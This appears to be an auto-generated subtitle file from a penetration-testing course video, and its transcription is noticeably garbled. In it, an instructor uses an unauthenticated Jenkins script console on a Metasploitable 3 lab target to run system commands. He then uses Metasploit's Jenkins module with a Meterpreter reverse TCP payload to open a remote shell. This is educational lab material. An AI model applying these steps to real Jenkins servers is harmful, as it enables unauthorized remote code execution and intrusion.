1
00:00:00,360 --> 00:00:07,560
So we'll need to choose a service and how do we do that, we list him as the only HTP module's.

2
00:00:09,350 --> 00:00:13,490
You know, I always do forget to sort them, but that's easily remedied.

3
00:00:14,830 --> 00:00:20,620
And we can look for the service on four eight four eight four, so open up your browser.

4
00:00:23,050 --> 00:00:31,910
And Type 10, 10 to 10, choline eight four, eight four, and that's what it looks like.

5
00:00:32,950 --> 00:00:36,220
So this is what's called a genuine application.

6
00:00:37,210 --> 00:00:45,340
It's pretty much a leading opensource automation server that provides building, deploying and automating

7
00:00:45,340 --> 00:00:53,500
any project so you can look for anything vulnerable on the Web site and that can give us a good start

8
00:00:54,190 --> 00:00:58,660
or you can go back to the console and try to find an exploit.

9
00:00:59,650 --> 00:01:02,290
So let's just quickly check the links.

10
00:01:02,730 --> 00:01:03,790
I nothing here.

11
00:01:05,630 --> 00:01:06,440
Nothing here.

12
00:01:08,260 --> 00:01:09,070
Nothing here.

13
00:01:11,720 --> 00:01:12,860
And nothing here.

14
00:01:15,840 --> 00:01:17,670
So here are the menus.

15
00:01:18,950 --> 00:01:20,330
You can go ahead and examine them.

16
00:01:21,950 --> 00:01:32,660
But I want to call your attention to two menus here, system information and script cons. First, let's

17
00:01:32,660 --> 00:01:34,790
check into the system information menu.

18
00:01:36,010 --> 00:01:37,750
Of course, it's going to be great information.

19
00:01:40,410 --> 00:01:47,280
If you don't know about Matus voidable three, this is a perfect place to start so that you can enumerate

20
00:01:47,280 --> 00:01:48,150
the target system.

21
00:01:49,140 --> 00:01:50,700
All right, so now let's have a look.

22
00:01:50,990 --> 00:01:54,720
A deep dive, as it were, into the script console.

23
00:01:56,410 --> 00:01:59,290
And when you read all of this information provided.

24
00:02:00,510 --> 00:02:05,220
I hope that you picked up that you can execute some groovy scripts from console.

25
00:02:06,490 --> 00:02:13,470
Now, at this point, you might not know about groovy, can you execute system commands over groovy

26
00:02:14,200 --> 00:02:14,680
so.

27
00:02:15,580 --> 00:02:17,440
I did find out, let's search.

28
00:02:18,350 --> 00:02:27,710
On a new tab type, how to execute system commands from and script console.

29
00:02:30,090 --> 00:02:31,380
I just click on the first one.

30
00:02:32,860 --> 00:02:35,500
And here's an answer that gets a green check.

31
00:02:36,680 --> 00:02:37,750
Let's check the answer.

32
00:02:38,700 --> 00:02:40,680
I think there's another worry about that answer.

33
00:02:42,310 --> 00:02:49,150
So I'm going to copy this, and if you want to control it, we can execute it from the script console.

34
00:02:49,990 --> 00:02:51,880
So it's paste it and run it.

35
00:02:53,310 --> 00:02:55,890
I don't think there's going to be a problem with execution.

36
00:02:57,860 --> 00:03:01,580
So let's change the commands and code.

37
00:03:03,230 --> 00:03:04,490
So only, alas.

38
00:03:05,750 --> 00:03:06,590
Executed.

39
00:03:07,670 --> 00:03:10,880
So let's change it to IP config.

40
00:03:11,870 --> 00:03:14,510
And yeah, this is executed as well.

41
00:03:15,720 --> 00:03:16,250
Who am I?

42
00:03:17,300 --> 00:03:17,960
OK.

43
00:03:19,770 --> 00:03:23,250
Now, I think that we found what we're looking for.

44
00:03:25,240 --> 00:03:30,520
So this obviously is going to take a lot of time and let's say I don't even know groovy that well,

45
00:03:30,820 --> 00:03:36,810
so you do need to find a reasonable exploit that can do all of this stuff for you.

46
00:03:36,850 --> 00:03:37,210
Right.

47
00:03:37,930 --> 00:03:39,730
So in a new tab.

48
00:03:41,030 --> 00:03:47,810
Let's have a search to see if there is an exploit for script, console, and naturally, Matus Boyd

49
00:03:47,810 --> 00:03:50,990
has an exploit module for this perfect.

50
00:03:52,240 --> 00:03:53,920
So now you can use this module.

51
00:03:55,280 --> 00:04:02,770
So let's go back to MSF console and choose Jenkins' script console as our export.

52
00:04:04,370 --> 00:04:05,270
Show options.

53
00:04:06,670 --> 00:04:18,550
Set our host to ten, ten to 10, set our report to eight, four, eight four, set payload to windows.

54
00:04:20,090 --> 00:04:21,020
Interpretor.

55
00:04:23,190 --> 00:04:24,790
Reverse TCP.

56
00:04:26,280 --> 00:04:29,400
Said, I'll host for payload to colleagues IP.

57
00:04:30,580 --> 00:04:36,850
Said homeport two four four four three, now show the options again.

58
00:04:38,410 --> 00:04:39,280
And then exploit.

59
00:04:41,440 --> 00:04:44,890
Oh, something went wrong.

60
00:04:45,700 --> 00:04:48,310
OK, so how are you going to fix it?

61
00:04:49,090 --> 00:04:55,180
Oh, yeah, you probably already saw the problem is target you are I variable?

62
00:04:56,400 --> 00:05:01,290
The you are out of the script console page is just like that, so.

63
00:05:02,310 --> 00:05:05,760
You should change its value to script.

64
00:05:06,800 --> 00:05:10,280
I'm going to directly exploit without further control.

65
00:05:16,980 --> 00:05:21,780
And I think that's OK, and that's how you get the interpreter session.

66
00:05:22,500 --> 00:05:25,880
Don't forget, though, where am I and who am I?

67
00:05:27,450 --> 00:05:33,960
And then we can spend that session to the background and let's have a look at the list of sessions.

68
00:05:34,880 --> 00:05:38,130
So you see, you have many sessions running on metastable three.

69
00:05:38,870 --> 00:05:42,290
All right, then let's go to the next service to exploit.